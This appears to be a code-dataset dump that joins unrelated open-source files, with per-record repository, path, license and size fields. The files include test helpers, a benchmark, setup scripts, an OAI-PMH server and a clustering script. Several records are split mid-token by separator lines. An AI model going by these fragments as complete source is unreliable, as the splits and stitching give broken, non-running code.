name = prefix + str(random.randint(1, 0x7fffffff))
return name[:max_length]
def create_resource(self, name_prefix, creation_func, *args, **kwargs):
"""Create a new resource that does not already exist.
:param name_prefix: The prefix for a randomly generated name
:param creation_func: A function taking the name of the resource
to be created as it's first argument. An error is assumed
to indicate a name collision.
:param *args *kwargs: These will be passed to the create function.
"""
while True:
name = self.get_rand_name(n_const.DEV_NAME_MAX_LEN, name_prefix)
try:
return creation_func(name, *args, **kwargs)
except RuntimeError:
continue
class BaseOVSLinuxTestCase(BaseLinuxTestCase):
def setUp(self, root_helper='sudo'):
super(BaseOVSLinuxTestCase, self).setUp(root_helper)
self.ovs = ovs_lib.BaseOVS(self.root_helper)
def create_ovs_bridge(self, br_prefix=BR_PREFIX):
br = self.create_resource(br_prefix, self.ovs.add_bridge)
self.addCleanup(br.destroy)
return br
|
stdlib-js/stdlib
|
lib/node_modules/@stdlib/math/base/special/cexp/benchmark/python/benchmark.py
|
Python
|
apache-2.0
| 2,220 | 0.00045 |
#!/usr/bin/env python
#
# @license Apache-2.0
#
# Copyright (c) 2018 The Stdlib Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Benchmark cexp."""
from __future__ import print_function
import timeit
NAME = "cexp"
REPEATS = 3
ITERATIONS = 1000000
def print_version():
"""Print the TAP version."""
print("TAP version 13")
def print_summary(total, passing):
"""Print the benchmark summary.
# Arguments
* `total`: total number of tests
* `passing`: number of passing tests
"""
print("#")
print("1.." + str(total)) # TAP plan
print("# total " + str(total))
print("# pass " + str(passing))
print("#")
print("# ok")
def print_results(elapsed):
"""Print benchmark results.
# Arguments
* `elapsed`: elapsed time (in seconds)
# Examples
``` python
python> print_results(0.131009101868)
```
"""
rate = ITERATIONS / elapsed
print(" ---")
print(" iterations: " + str(ITERATIONS))
print(" elapsed: " + str(elapsed))
print(" rate: " + str(rate))
print(" ...")
def benchmark():
"""Run the benchmark and print benchmark results."""
setup = "from random import random; from cmath import exp;"
stmt = "re = (random()*100.0) - 50.0; im = (random()*100.0) - 50.0; y = exp(re + 1.0j * im);"
t = timeit.Timer(stmt, setup=setup)
print_version()
for i in range(REPEATS):
print("# python::" + NAME)
elapsed = t.timeit(number=ITERATIONS)
print_results(elapsed)
print("ok " + str(i+1) + " b
|
enchmark
|
finished")
print_summary(REPEATS, REPEATS)
def main():
"""Run the benchmark."""
benchmark()
if __name__ == "__main__":
main()
|
facebookexperimental/eden
|
eden/hg-server/tests/get-with-headers.py
|
Python
|
gpl-2.0
| 2,434 | 0.000411 |
#!/usr/bin/env python
"""This does HTTP GET requests given a host:port and path and returns
a subset of the headers plus the body of the result."""
from __future__ import absolute_import, print_function
import json
import os
import sys
from edenscm.mercurial import util
httplib = util.httplib
try:
import msvcrt
msvcrt.setmode(sys.stdout.fileno(), os.O_BINARY)
msvcrt.setmode(sys.stderr.fileno(), os.O_BINARY)
except ImportError:
pass
twice = False
if "--twice" in sys.argv:
s
|
ys.argv.remove("--twice")
twice = True
headeronly = False
if "--headeronly" in sys.argv:
sys.argv.remove("--headeronly")
headeronly = True
formatjson = Fal
|
se
if "--json" in sys.argv:
sys.argv.remove("--json")
formatjson = True
hgproto = None
if "--hgproto" in sys.argv:
idx = sys.argv.index("--hgproto")
hgproto = sys.argv[idx + 1]
sys.argv.pop(idx)
sys.argv.pop(idx)
tag = None
def request(host, path, show):
assert not path.startswith("/"), path
global tag
headers = {}
if tag:
headers["If-None-Match"] = tag
if hgproto:
headers["X-HgProto-1"] = hgproto
conn = httplib.HTTPConnection(host)
conn.request("GET", "/" + path, None, headers)
response = conn.getresponse()
print(response.status, response.reason)
if show[:1] == ["-"]:
show = sorted(h for h, v in response.getheaders() if h.lower() not in show)
for h in [h.lower() for h in show]:
if response.getheader(h, None) is not None:
print("%s: %s" % (h, response.getheader(h)))
if not headeronly:
print()
data = response.read()
# Pretty print JSON. This also has the beneficial side-effect
# of verifying emitted JSON is well-formed.
if formatjson:
# json.dumps() will print trailing newlines. Eliminate them
# to make tests easier to write.
data = json.loads(data)
lines = json.dumps(data, sort_keys=True, indent=2).splitlines()
for line in lines:
print(line.rstrip())
else:
sys.stdout.write(data)
if twice and response.getheader("ETag", None):
tag = response.getheader("ETag")
return response.status
status = request(sys.argv[1], sys.argv[2], sys.argv[3:])
if twice:
status = request(sys.argv[1], sys.argv[2], sys.argv[3:])
if 200 <= status <= 305:
sys.exit(0)
sys.exit(1)
|
mcanthony/nupic
|
setup.py
|
Python
|
agpl-3.0
| 4,025 | 0.00472 |
# ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2015, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have receive
|
d a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
"""Installation script for Python nupic package."""
import os
import setuptools
import sys
from setuptools import setup, find_packages, Extension
REPO_DIR = os.path.dirname(os.path.realpath(__file__))
def getVersion():
"""
Get ver
|
sion from local file.
"""
with open(os.path.join(REPO_DIR, "VERSION"), "r") as versionFile:
return versionFile.read().strip()
def parse_file(requirementFile):
try:
return [
line.strip()
for line in open(requirementFile).readlines()
if not line.startswith("#")
]
except IOError:
return []
def findRequirements():
"""
Read the requirements.txt file and parse into requirements for setup's
install_requirements option.
"""
requirementsPath = os.path.join(REPO_DIR, "external", "common",
"requirements.txt")
requirements = parse_file(requirementsPath)
return requirements
if __name__ == "__main__":
requirements = findRequirements()
setup(
name="nupic",
version=getVersion(),
install_requires=requirements,
package_dir = {"": "src"},
packages=find_packages("src"),
namespace_packages = ["nupic"],
package_data={
"nupic.support": ["nupic-default.xml",
"nupic-logging.conf"],
"nupic": ["README.md", "LICENSE.txt"],
"nupic.data": ["*.json"],
"nupic.frameworks.opf.exp_generator": ["*.json", "*.tpl"],
"nupic.frameworks.opf.jsonschema": ["*.json"],
"nupic.swarming.exp_generator": ["*.json", "*.tpl"],
"nupic.swarming.jsonschema": ["*.json"],
"nupic.datafiles": ["*.csv", "*.txt"],
},
include_package_data=True,
zip_safe=False,
description="Numenta Platform for Intelligent Computing",
author="Numenta",
author_email="help@numenta.org",
url="https://github.com/numenta/nupic",
classifiers=[
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"License :: OSI Approved :: GNU Affero General Public License v3 or later (AGPLv3+)",
"Operating System :: MacOS :: MacOS X",
"Operating System :: POSIX :: Linux",
# It has to be "5 - Production/Stable" or else pypi rejects it!
"Development Status :: 5 - Production/Stable",
"Environment :: Console",
"Intended Audience :: Science/Research",
"Topic :: Scientific/Engineering :: Artificial Intelligence"
],
long_description=(
"Numenta Platform for Intelligent Computing: a machine intelligence "
"platform that implements the HTM learning algorithms. HTM is a "
"detailed computational theory of the neocortex. At the core of HTM "
"are time-based continuous learning algorithms that store and recall "
"spatial and temporal patterns. NuPIC is suited to a variety of "
"problems, particularly anomaly detection and prediction of streaming "
"data sources.\n\n"
"For more information, see http://numenta.org or the NuPIC wiki at "
"https://github.com/numenta/nupic/wiki.")
)
|
RalfBarkow/Zettelkasten
|
venv/lib/python3.9/site-packages/pip/_internal/index/__init__.py
|
Python
|
gpl-3.0
| 30 | 0 |
"""Index
|
interaction code
"
|
""
|
rsalmei/clearly
|
clearly/utils/colors.py
|
Python
|
mit
| 1,146 | 0 |
from typing import List, TypeVar
C = TypeVar('C') # how to constrain to only the closure below?
def color_factory(color_code: str) -> C:
def apply(text: str, format_spec: str = '') -> str:
return color_code + format(text, format_spec) + '\033[0m'
def mix(*colors: C) -> List[C]:
return [color_factory(c.color_code + color_code) for c in colors]
apply.mix, apply.color_code = mix, color_code
return apply
class Colors:
BLUE = color_factory('\033[94m')
GREEN = color_factory('\033[92m')
YELLOW = color_factory('\033[93m')
RED = color_factory('\033[91m')
MAGENTA = color_factory('\033[95m')
CYAN = color_factory('\033[96m')
ORANGE = color_factory('\033[38;5;208m')
BOLD = color_factory('\033[1m')
DIM = color_factory('\033[2m')
BLUE_BOLD, BLUE_DIM = BLUE.mix(BOLD, DIM)
GREEN_BOLD, GREEN_DIM = GREEN.mix(BOLD, DIM)
YELLOW_BOLD, YELLOW_DIM = YELLOW.mix(BOLD, DIM)
|
RED_BOLD, RED_DIM = RED.mix(BOLD, DIM)
MAGENTA_BOLD, MAGENTA_DIM = MAGENTA.mix(BOLD, DIM)
CYAN_BOLD, CYAN_DIM = CYAN.mix(BOLD, DIM)
ORANGE_BOLD, ORAN
|
GE_DIM = ORANGE.mix(BOLD, DIM)
|
erinspace/osf.io
|
osf_tests/test_files.py
|
Python
|
apache-2.0
| 2,401 | 0.002499 |
import pytest
from django.contrib.contenttypes.models import ContentType
from addons.osfstorage import settings as osfstorage_settings
from osf.models import BaseFileNode, Folder, File
from osf_tests.factories import (
UserFactory,
ProjectFactory
)
pytestmark = pytest.mark.django_db
@pytest.fixture()
def user():
return UserFactory()
@pytest.fixture()
def project(user):
return ProjectFactory(creator=user)
@pytest.fixture()
def create_test_file(fake):
# TODO: Copied from api_tests/utils.py. DRY this up.
def _create_test_file(target, user=None, filename=None, create_guid=True):
filename = filename or fake.file_name()
user = user or target.creator
osfstorage = target.get_addon('osfstorage')
root_node = osfstorage.get_root()
test_file = root_node.append_file(filename)
if create_guid:
test_file.get_guid(create=True)
test_file.create_version(user, {
'object': '06d80e',
'service': 'cloud',
osfstorage_settings.WATERBUTLER_RESOURCE: 'osf',
}, {
'size': 1337,
'contentType': 'img/png'
}).save()
return test_file
return _create_test_file
def test_active_manager_does_not_return_trashed_file_nodes(project, create_test_file):
create_test_file(target=project)
deleted_file = create_test_file(target=project)
deleted_file.delete(user=project.creator, save=True)
content_type_for_query = ContentType.objects.get_for_model(project)
# root folder + file + deleted_file = 3 BaseFileNodes
assert BaseFileNode.objects.filter(target_object_id=project.id, target_content_type=content_type_for_query).count() == 3
# root folder + file =
|
2 BaseFileNodes
assert BaseFileNode.active.filter(target_object_id=project.
|
id, target_content_type=content_type_for_query).count() == 2
def test_folder_update_calls_folder_update_method(project, create_test_file):
file = create_test_file(target=project)
parent_folder = file.parent
# the folder update method should be the Folder.update method
assert parent_folder.__class__.update == Folder.update
# the folder update method should not be the File update method
assert parent_folder.__class__.update != File.update
# the file update method should be the File update method
assert file.__class__.update == File.update
|
ludmilamarian/invenio
|
invenio/legacy/oairepository/server.py
|
Python
|
gpl-2.0
| 34,384 | 0.006893 |
# This file is part of Invenio.
# Copyright (C) 2009, 2010, 2011, 2014, 2015 CERN.
#
# Invenio is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""Receive OAI-PMH 2.0 requests and responds"""
__revision__ = "$Id$"
from six.moves import cPickle
import os
import re
import time
import tempfile
import sys
import datetime
if sys.hexversion < 0x2050000:
from glob import glob as iglob
else:
from glob import iglob
from flask import url_for, abort
from flask_login import current_user
from intbitset import intbitset
from six import iteritems
from invenio.config import \
CFG_BIBUPLOAD_EXTERNAL_OAIID_TAG, \
CFG_CACHEDIR, \
CFG_CERN_SITE, \
CFG_OAI_DELETED_POLICY, \
CFG_OAI_EXPIRE, \
CFG_OAI_FRIENDS, \
CFG_OAI_IDENTIFY_DESCRIPTION, \
CFG_OAI_ID_FIELD, \
CFG_OAI_ID_PREFIX, \
CFG_OAI_LOAD, \
CFG_OAI_METADATA_FORMATS, \
CFG_OAI_PREVIOUS_SET_FIELD, \
CFG_OAI_PROVENANCE_ALTERED_SUBFIELD, \
CFG_OAI_PROVENANCE_BASEURL_SUBFIELD, \
CFG_OAI_PROVENANCE_DATESTAMP_SUBFIELD, \
CFG_OAI_PROVENANCE_HARVESTDATE_SUBFIELD, \
CFG_OAI_PROVENANCE_METADATANAMESPACE_SUBFIELD, \
CFG_OAI_PROVENANCE_ORIGINDESCRIPTION_SUBFIELD, \
CFG_OAI_SAMPLE_IDENTIFIER, \
CFG_OAI_SET_FIELD, \
CFG_SITE_NAME, \
CFG_SITE_SUPPORT_EMAIL, \
CFG_SITE_URL, \
CFG_WEBSTYLE_HTTP_USE_COMPRESSION
from invenio.base.globals import cfg
from invenio.ext.logging import register_exception
from invenio.legacy.bibrecord import record_get_field_instances
from invenio.legacy.dbquery import run_sql, wash_table_column_name, \
datetime_format
from invenio.legacy.oairepository.config import CFG_OAI_REPOSITORY_GLOBAL_SET_SPEC
from invenio.legacy.search_engine import record_exists, \
search_unit_in_bibxxx, get_record
from invenio_formatter import format_record
from invenio.modules.search.api import Query
from invenio.utils.date import localtime_to_utc, utc_to_localtime
from invenio.utils.html import X, EscapedXMLString
CFG_VERBS = {
'GetRecord' : ['identifier', 'metadataPrefix'],
'Identify' : [],
'ListIdentifiers' : ['from', 'until',
'metadataPrefix',
'set',
'resumptionToken'],
'ListMetadataFormats': ['identifier'],
'ListRecords' : ['from', 'until',
'metadataPrefix',
'set',
'resumptionToken'],
'ListSets' : ['resumptionToken']
}
CFG_ERRORS = {
"badArgument": "The request includes illegal arguments, is missing required arguments, includes a repeated argument, or values for arguments have an illegal syntax:",
"badResumptionToken": "The value of the resumptionToken argument is invalid or expired:",
"badVerb": "Value of the verb argument is not a legal OAI-PMH verb, the verb argument is missing, or the verb argument is repeated:",
"cannotDisseminateFormat": "The metadata format identified by the value given for the metadataPrefix argument is not supported by the item or by the repository:",
"idDoesNotExist": "The value of the identifier argument is unknown or illegal in this repository:",
"noRecordsMatch": "The combination of the values of the from, until, set and metadataPrefix arguments results in an empty list:",
"noMetadataFormats": "There are no metadata formats available for the specified item:",
"noSetHierarchy": "The repository does not support sets:"
}
CFG_MIN_DATE = "1970-01-01T00:00:00Z"
CFG_MAX_DATE = "9999-12-31T23:59:59Z"
def get_all_field_values(tag):
"""
Return all existing values stored for a given tag.
@param tag: the full tag, e.g. 909C0b
@type tag: string
@return: the list of values
@rtype: list of strings
"""
table = 'bib%02dx' % int(tag[:2])
return [row[0] for row in run_sql("SELECT DISTINCT(value) FROM %s WHERE tag=%%s" % table, (tag, ))]
def oai_error(argd, errors):
"""
Return a well-formatted OAI-PMH error
"""
out = """<?xml version="1.0" encoding="UTF-8"?>
<OAI-PMH xmlns="http://www.openarchives.org/OAI/2.0/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.openarchives.org/OAI/2.0/
http://www.openarchives.org/OAI/2.0/OAI-PMH.xsd">"""
out += X.responseDate()(get_utc_now())
for error_code, error_msg in errors:
assert(error_code in CFG_ERRORS)
if error_code in ("badArgument", "badVerb"):
out += X.request()(oai_get_request_url())
break
else:
## There are no badArgument or badVerb errors so we can
## return the whole request information
out += X.request(**argd)(oai_get_request_url())
for error_code, error_msg in errors:
if error_msg is None:
error_msg = CFG_ERRORS[error_code]
else:
error_msg = "%s %s" % (CFG_ERRORS[error_code], error_msg)
out += X.error(code=error_code)(error_msg)
out += "</OAI-PMH>"
return out
def oai_header(argd, verb):
"""
Return OAI header
"""
out = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>" + "\n"
out += "<?xml-stylesheet type=\"text/xsl\" href=\"%s\" ?>\n" % (
url_for('oairepository.static',
filename='xsl/oairepository/oai2.xsl.v1.0'))
out += "<OAI-PMH xmlns=\"http://www.openarchives.org/OAI/2.0/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://www.openarchives.org/OAI/2.0/ http://www.openarchives.org/OAI/2.0/OAI-PMH.xsd\">\n"
#out += "<responseDate>%s</responseDate>" % get_utc_now()
out += X.responseDate()(get_utc_now())
if verb:
out += X.request(**argd)(oai_get_request_url())
out += "<%s>\n" % verb
else:
out += X.request()(oai_get_request_url())
return out
def oai_footer(verb):
"""
@
|
return: the OAI footer.
"""
out = ""
if verb:
out += "</%s>\n
|
" % (verb)
out += "</OAI-PMH>\n"
return out
def get_field(recid, field):
"""
Gets list of field 'field' for the record with 'recid' system number.
"""
digit = field[0:2]
bibbx = "bib%sx" % digit
bibx = "bibrec_bib%sx" % digit
query = "SELECT bx.value FROM %s AS bx, %s AS bibx WHERE bibx.id_bibrec=%%s AND bx.id=bibx.id_bibxxx AND bx.tag=%%s" % (wash_table_column_name(bibbx), wash_table_column_name(bibx))
return [row[0] for row in run_sql(query, (recid, field))]
def get_modification_date(recid):
"""Returns the date of last modification for the record 'recid'.
Return empty string if no record or modification date in UTC.
"""
out = ""
res = run_sql("SELECT " + datetime_format('modification_date') + " FROM bibrec WHERE id=%s", (recid,), 1)
if res and res[0][0]:
out = localtime_to_utc(res[0][0])
return out
def get_earliest_datestamp():
"""Get earliest datestamp in the database
Return empty string if no records or earliest datestamp in UTC.
"""
out = CFG_MIN_DATE
res = run_sql("SELECT " + datetime_format('MIN(creation_date)', False) + " FROM bibrec", n=1)
if res and res[0][0]:
out = localtime_to_utc(res[0][0])
return out
def get_latest_datestamp():
"""Get latest datestamp in the database
Return empty string if no records or latest datestamp in UTC.
"""
out = CFG_MAX_DATE
res = run_sql("SELECT " + datetime_format('MAX(modification_date)', False) + " FROM bibrec", n=1)
|
rchurch4/georgetown-data-science-fall-2015
|
analysis/clusterings/clustering.py
|
Python
|
mit
| 4,732 | 0.01585 |
# clustering.py
# cluster yelp and TA data
#
# Rob Churchill
#
# NOTE: IN ORDER TO GET ANY VISUALIZATIONS OUT OF THIS SCRIPT,
# YOU MUST PUT THIS IN AN IPYTHON NOTEBOOK OR SOMETHING SIMILAR
#
# NOTE: I learned to do this in my data science class last semester. If you are looking for plagiarism things, you will almost certainly find similar clustering code.
# I did not copy it, I learned this specific way of doing it, and referred to my previous assignments when doing it for this project. If you would like to see my previous
# assignments, I will provide you them on request. Otherwise, I don't think that it's worth adding a lot of extra files for the sole sake of showing that I haven't plagiarized.
import scipy as sp
import numpy as np
import math
from sklearn.cluster import KMeans
import scipy.cluster.hierarchy as hr
from sklearn.cluster import DBSCAN
import csv
import matplotlib.pyplot as plt
import seaborn as sns
%matplotlib inline
folder = 'data/'
file_names = ['yelp_data.csv', 'trip_advisor_data.csv']
yelp_dataset = list()
#change the index of file_names in this line to 0 if you want to cluster yelp, 1 if you want to cluster trip advisor
with open(folder+file_names[1], 'r') as f:
reader = csv.reader(f)
for line in reader:
yelp_dataset.append(line)
# remove headers
yelp_dataset.remove(yelp_dataset[0])
# throw out the fields we don't need so that we have enough memory to cluster such a large dataset
new_yelp_ds = []
for y in yelp_dataset:
local = 0
if y[19] == "TRUE":
local = 1
if y[19] in ["FALSE", "TRUE"]:
for l in range(0, len(y)):
if y[l] == "NA":
y[l] = 0
if int(y[11]) > 99:
# mean_r
|
ating, distance
y = [float(y[21]), math.log(float(y[18])+1), math.log(int(y[6])+1)]
new_yelp_ds.append(y)
# this condensed dataset is now our working dataset
yelp_dataset = np.array(new_yelp_ds)
print len(yelp_dataset)
#print np.amax(yelp_dataset[:,1])
# start kmeans. try it with 1...11 clusters to see which is best. for both, it was two.
error = np.zeros(11)
error[0] = 0
for k in range(1,11):
kmeans = KMeans(n_clusters=k)
kmeans.fit_predict(yelp_dataset)
|
centroids = kmeans.cluster_centers_
labels = kmeans.labels_
error[k] = kmeans.inertia_
plt.plot(range(1,len(error)),error[1:])
plt.xlabel('Number of clusters')
plt.ylabel('Error')
# run kmeans on the optimal k
kmeans = KMeans(n_clusters=2, n_init=15)
kmeans.fit_predict(yelp_dataset)
centroids = kmeans.cluster_centers_
labels = kmeans.labels_
error = kmeans.inertia_
print labels
print error
# make it pretty and plot it. kmeans told us literally nothing about this dataset.
colors = []
for l in labels:
if l == 0:
colors.append('r')
elif l== 1:
colors.append('b')
elif l == 2:
colors.append('g')
elif l == 3:
colors.append('c')
else:
colors.append('m')
plt.scatter(yelp_dataset[:,1], yelp_dataset[:,2], c=colors, s=8, lw=0)
# set up dbscan, set the eps based on the website
# for yelp, use 0.25. For trip advisor use 0.5
dbscan = DBSCAN(eps = 0.5)
# run dbscan on the data
dbscan.fit_predict(yelp_dataset)
labels = dbscan.labels_
print labels
# make it pretty and plot it. dbscan highlights some major grouping of reviews in the data,
# especially the local and non-local groups.
colors = []
for l in labels:
if l == 0:
colors.append('r')
elif l== 1:
colors.append('b')
elif l == 2:
colors.append('g')
elif l == 3:
colors.append('c')
elif l == 4:
colors.append('y')
else:
colors.append('m')
plt.scatter(yelp_dataset[:,1], yelp_dataset[:,2], c=colors, s=8, lw=0)
# hierarchical clustering is a very memory consuming algorithm, so we can only take a small subset of the dataset
# we randomly permute and take the first 1000.
permutation = np.random.permutation(yelp_dataset)
small_ds = permutation[:1000]
# run the algorithm on our data
Z = hr.linkage(small_ds, method='complete', metric='euclidean')
print Z.shape, small_ds.shape
# plot the dendrogram to see how the clusters were created.
fig = plt.figure(figsize=(10,10))
T = hr.dendrogram(Z,color_threshold=0.4, leaf_font_size=1)
fig.show()
# cluster our data and get the labels for plotting.
labels = hr.fcluster(Z, t=7, depth=8)
#print labels
# make it pretty and plot it. heirarchical clustering, like kmeans, showed us nothing interesting.
colors = []
for l in labels:
if l == 0:
colors.append('r')
elif l== 1:
colors.append('b')
elif l == 2:
colors.append('r')
elif l == 3:
colors.append('c')
elif l == 4:
colors.append('y')
else:
colors.append('m')
plt.scatter(yelp_dataset[:,1], yelp_dataset[:,2], c=colors, s=8, lw=0)
|
noutenki/descriptors
|
descriptors/__init__.py
|
Python
|
mit
| 631 | 0 |
# descriptors.__init__
#
# Expose Descriptor, Validated,
|
and all descriptors so they can be
# imported via "from descriptors import ..."
from __future__ import print_function, unicode_literals, division
from descriptors.Descriptor import Descriptor
from descriptors.Validated import Validated
import descriptors.handmade as
|
hm
import descriptors.massproduced as mm
_all_descriptors = set([
(obj_name, obj)
for module in (hm, mm)
for obj_name, obj in module.__dict__.items()
if obj.__class__.__name__ == "DescriptorMeta"])
_all_descriptors.discard(("Descriptor", Descriptor))
globals().update(_all_descriptors)
|
antont/tundra
|
src/Application/PythonScriptModule/pymodules_old/lib/webdav/acp/__init__.py
|
Python
|
apache-2.0
| 829 | 0 |
# Copyright 2008 German Aerospace Center (DLR)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicabl
|
e law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# S
|
ee the License for the specific language governing permissions and
# limitations under the License.
from webdav.acp.Acl import ACL
from webdav.acp.Ace import ACE
from webdav.acp.GrantDeny import GrantDeny
from webdav.acp.Privilege import Privilege
from webdav.acp.Principal import Principal
__version__ = "$LastChangedRevision: 2 $"
|
JDougherty/mbtapy
|
setup.py
|
Python
|
apache-2.0
| 355 | 0.002817 |
from setupto
|
ols import setup
setup(
name="mbtapy",
version='0.1.0dev1',
description='Python bindings
|
for the MBTA-REALTIME API (v2)',
author="Joseph Dougherty",
author_email="mbtapy@jwdougherty.com",
url='https://github.com/JDougherty/mbtapy',
install_requires=['requests'],
license='LICENSE',
packages=['mbtapy'],
)
|
FR4NK-W/osourced-scion
|
python/lib/rev_cache.py
|
Python
|
apache-2.0
| 5,118 | 0.001172 |
# Copyright 2017 ETH Zurich
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
:mod:`rev_cache` --- Cache for revocations
==========================================
"""
# Stdlib
import logging
import threading
# External
from prometheus_client import Counter, Gauge
# SCION
from lib.crypto.hash_tree import ConnectedHashTree
# Exported metrics.
REVS_TOTAL = Gauge("rc_revs_total", "# of cached revocations", ["server_id", "isd_as"])
REVS_BYTES = Gauge("rc_revs_bytes", "RevCache memory usage", ["server_id", "isd_as"])
REVS_ADDED = Counter("rc_revs_added_total", "Total revocations added",
["server_id", "isd_as"])
REVS_REMOVED = Counter("rc_revs_removed_total", "Total revocations removed",
["server_id", "isd_as"])
def _mk_key(rev_info):
"""Returns the key for a RevocationInfo object."""
return (rev_info.isd_as(), rev_info.p.ifID)
class RevCache:
"""Thread-safe cache for revocations with auto expiration of entries."""
def __init__(self, capacity=1000, labels=None): # pragma: no cover
"""
:param dict labels:
Labels added to the exported metrics. The following labels are supported:
- server_id: A unique identifier of the server that is exporting
- isd_as: The ISD_AS of where the server is running
- type: A generic label for the type of the revocations.
"""
self._cache = {}
self._lock = threading.RLock()
self._capacity = capacity
self._labels = labels
if self._labels:
self._init_metrics()
def _init_metrics(self): # pragma: no cover
REVS_TOTAL.labels(**self._labels).set(0)
REVS_BYTES.labels(**self._labels).set(0)
REVS_ADDED.labels(**self._labels).inc(0)
REVS_REMOVED.labels(**self._labels).inc(0)
def __contains__(self, rev_info): # pragma: no cover
return self.contains_key(_mk_key(rev_info))
def contains_key(self, key): # pragma: no cover
with self._lock:
stored_info = self._cache.get(key)
return stored_info and self._validate_entry(stored_info)
def __getitem__(self, key): # pragma: no cover
return self.get(key)
def get(self, key, default=None):
with self._lock:
try:
rev_info = self._cache[key]
except KeyError:
return default
if self._validate_entry(rev_info):
return rev_info
return default
def add(self, rev_info):
"""
Adds rev_info to the cache and returns True if the operation succeeds.
"""
if ConnectedHashTree.verify_epoch(rev_info.p.epoch) != ConnectedHashTree.EPOCH_OK:
return False
with self._lock:
key = _mk_key(rev_info)
stored_info = self.get(key)
if not stored_info:
# Try to free up space in case the cache reaches the cap limit.
if len(self._cache) >= self._capacity:
for info in list(self._cache.values()):
self._validate_entry(info)
# Couldn't free up enough space...
if len(self._cache) >= self._capacity:
logging.error("Revocation cache full!.")
return False
self._cache[key] = rev_info
if self._labels:
REVS_ADDED.labels(**self._labels).inc()
REVS_TOTAL.labels(**self._labels).inc()
REVS_BYTES.labels(**self._labels).inc(len(rev_info))
return T
|
rue
if rev_info.p.epoch > stored_info.p.epoch:
self._cache[key] = rev_info
if self._labels:
REVS_ADDED.labels(**self._labels).inc()
REVS_REMOVED.labels(**self._labels).inc()
REVS_BYTES.labels(**self._labels).inc(len(rev_info) - len(stored_info))
return True
return Fal
|
se
def _validate_entry(self, rev_info, cur_epoch=None): # pragma: no cover
"""Removes an expired revocation from the cache."""
if (ConnectedHashTree.verify_epoch(rev_info.p.epoch, cur_epoch) !=
ConnectedHashTree.EPOCH_OK):
del self._cache[_mk_key(rev_info)]
if self._labels:
REVS_REMOVED.labels(**self._labels).inc()
REVS_TOTAL.labels(**self._labels).dec()
REVS_BYTES.labels(**self._labels).dec(len(rev_info))
return False
return True
|
romilly/pegasus-autocode
|
autocode/firstprog.py
|
Python
|
mit
| 126 | 0 |
__aut
|
hor__ = 'romilly'
v1 = 1.0
v2 = 1.0
n1 = 1
while v2 > 10e-6:
v2
|
= v2 / n1
v1 = v1 + v2
n1 = n1 + 1
print v1
|
oVirt/jenkins
|
stdci_libs/inject_repos.py
|
Python
|
gpl-3.0
| 1,611 | 0.003724 |
#!/usr/bin/env python3
"""inject_repos.py - CI secret repos injection.
"""
import yaml
from lxml import etree
from lxml.etree import ElementTree as ET
import argparse
from six import iteritems
def main():
repos_file, beaker_file = parse_args()
repos = load_secret_data(repos_f
|
ile)
inject_repos(repos, beaker_file)
def parse_args():
description_msg = 'Resolve and filter secret dat
|
a'
parser = argparse.ArgumentParser(description=description_msg)
parser.add_argument(
"-f", "--secret-file", type=str,
help=("Path to secret file.")
)
parser.add_argument(
"-b", "--beaker-file", type=str,
help=("Path to beaker file.")
)
args = parser.parse_args()
return args.secret_file, args.beaker_file
def load_secret_data(file_to_load=None):
"""Load yaml file from a given location
:param str file_to_load: (optional) Path to the file we need to load.
:rtype: list
:returns: A list with the file's data. An empty list if data was not found.
"""
try:
with open(file_to_load, 'r') as sf:
return yaml.safe_load(sf)
except IOError:
return []
def inject_repos(repos, beaker_file):
parser = etree.XMLParser(strip_cdata=False)
tree = etree.parse(beaker_file, parser)
root = tree.getroot()
for repo_name, url in iteritems(repos):
etree.SubElement(root[1][0][4], "repo",
attrib={"name": repo_name, "url": url})
tree.write(
beaker_file, pretty_print=True,
xml_declaration=True, encoding="utf-8"
)
if __name__ == "__main__":
main()
|
vecnet/vnetsource
|
ts_emod/views/DownloadView.py
|
Python
|
mpl-2.0
| 1,812 | 0.004415 |
########################################################################################################################
# VECNet CI - Prototype
# Date: 03/21/2014
# Institution: University of Notre Dame
# Primary Authors:
# Robert Jones <Robert.Jones.428@nd.edu>
########################################################################################################################
